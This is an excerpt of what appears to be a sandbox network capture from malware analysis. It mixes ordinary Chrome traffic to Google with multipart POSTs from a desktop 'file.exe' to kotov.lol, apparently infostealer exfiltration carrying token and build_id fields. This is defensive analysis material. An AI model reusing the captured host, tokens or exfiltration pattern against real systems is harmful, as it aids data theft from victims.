2024-11-29 11:27:35 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------DAKEBAKFHCFHIEBFBAFBCont
2024-11-29 11:27:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49718	142.250.181.68	443	8116	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:41 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIkMrNAQi5ys0BCIrTzQEIx9TNAQih1s0BCKjYzQEI+cDUFRjBy8wBGLrSzQEYxdjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-29 11:27:42 UTC	1266	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:27:41 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-FsZWSPsPTjoqyrDWuu_XrQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-29 11:27:42 UTC	124	IN	Data Raw: 33 32 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 65 67 67 73 20 72 65 63 61 6c 6c 65 64 20 73 61 6c 6d 6f 6e 65 6c 6c 61 20 63 6f 73 74 63 6f 22 2c 22 66 61 6e 74 61 73 79 20 66 6f 6f 74 62 61 6c 6c 20 73 74 61 72 74 20 65 6d 20 73 69 74 20 65 6d 20 77 65 65 6b 20 31 33 22 2c 22 76 69 74 6f 20 74 68 65 20 70 75 67 20 6e 61 74 69 6f 6e 61 6c 20 64 6f 67 20 73 68 6f 77 22 Data Ascii: 32f)]}'["",["eggs recalled salmonella costco","fantasy football start em sit em week 13","vito the pug national dog show"
2024-11-29 11:27:42 UTC	698	IN	Data Raw: 2c 22 66 69 73 63 68 20 63 6f 64 65 73 20 72 6f 62 6c 6f 78 22 2c 22 72 75 73 73 69 61 6e 20 72 75 62 6c 65 20 65 78 63 68 61 6e 67 65 20 72 61 74 65 22 2c 22 74 68 61 6e 6b 73 67 69 76 69 6e 67 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 2c 22 72 61 64 69 6f 20 63 69 74 79 20 72 6f 63 6b 65 74 74 65 73 22 2c 22 74 68 61 6e 6b 73 67 69 76 69 6e 67 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 20 73 6e 6f 77 20 73 74 6f 72 6d 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 Data Ascii: ,"fisch codes roblox","russian ruble exchange rate","thanksgiving weather forecast","radio city rockettes","thanksgiving weather forecast snow storm"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4
2024-11-29 11:27:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49722	142.250.181.68	443	8116	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:42 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIkMrNAQi5ys0BCIrTzQEIx9TNAQih1s0BCKjYzQEI+cDUFRjBy8wBGLrSzQEYxdjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-29 11:27:43 UTC	1018	IN	HTTP/1.1 200 OK Version: 700238841 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 29 Nov 2024 11:27:43 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-29 11:27:43 UTC	372	IN	Data Raw: 31 38 35 65 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 185e)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-29 11:27:43 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-11-29 11:27:43 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-11-29 11:27:43 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-11-29 11:27:43 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-11-29 11:27:43 UTC	314	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 31 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700319,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u003dthis
2024-11-29 11:27:43 UTC	254	IN	Data Raw: 66 38 0d 0a 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 7a 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 0d 0a Data Ascii: f8f Array)for(var d of c)_.zd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Err
2024-11-29 11:27:43 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 41 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 42 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 41 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 42 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 7a 64 28 5f 2e 6a 64 2c 41 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e Data Ascii: 8000or(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar Ad\u003ddocument.querySelector(\".gb_I .gb_A\"),Bd\u003ddocument.querySelector(\"#gb.gb_Rc\");Ad\u0026\u0026!Bd\u0026\u0026_.zd(_.jd,Ad,\"click\");\n}catch(e){_._DumpException(e)}\ntry{\n_.
2024-11-29 11:27:43 UTC	1390	IN	Data Raw: 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4e 64 28 5f 2e 4a 64 3f 5f 2e 4a 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 53 64 2c 66 65 2c 52 64 2c 54 64 2c 59 64 3b 5f 2e 50 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 51 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c Data Ascii: tring(){return this.i+\"\"}};_.Od\u003dnew _.Nd(_.Jd?_.Jd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Sd,fe,Rd,Td,Yd;_.Pd\u003dfunction(a){return a\u003d\u003dnull?a:Number.isFinite(a)?a\|0:void 0};_.Qd\u003dfunction(a){if(a\u003d\u003dnull
2024-11-29 11:27:43 UTC	1390	IN	Data Raw: 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 75 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 51 64 28 5f 2e 4a 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 50 64 28 5f 2e 4a 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 76 62 28 5f 2e 64 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c Data Ascii: d\"number\"};_.ce\u003dfunction(a,b,c){return _.ub(a,b,c,!1)!\u003d\u003dvoid 0};_.de\u003dfunction(a,b){return _.Qd(_.Jc(a,b))};_.S\u003dfunction(a,b){return _.Pd(_.Jc(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.vb(_.de(a,b),c)};_.ee\u003dfunction(a,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49724	142.250.181.68	443	8116	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:43 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-29 11:27:43 UTC	933	IN	HTTP/1.1 200 OK Version: 700238841 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 29 Nov 2024 11:27:43 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-29 11:27:43 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-29 11:27:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49728	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:44 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:44 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------EHIJJDGDHDGDAKFIECFICont
2024-11-29 11:27:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49729	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:45 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
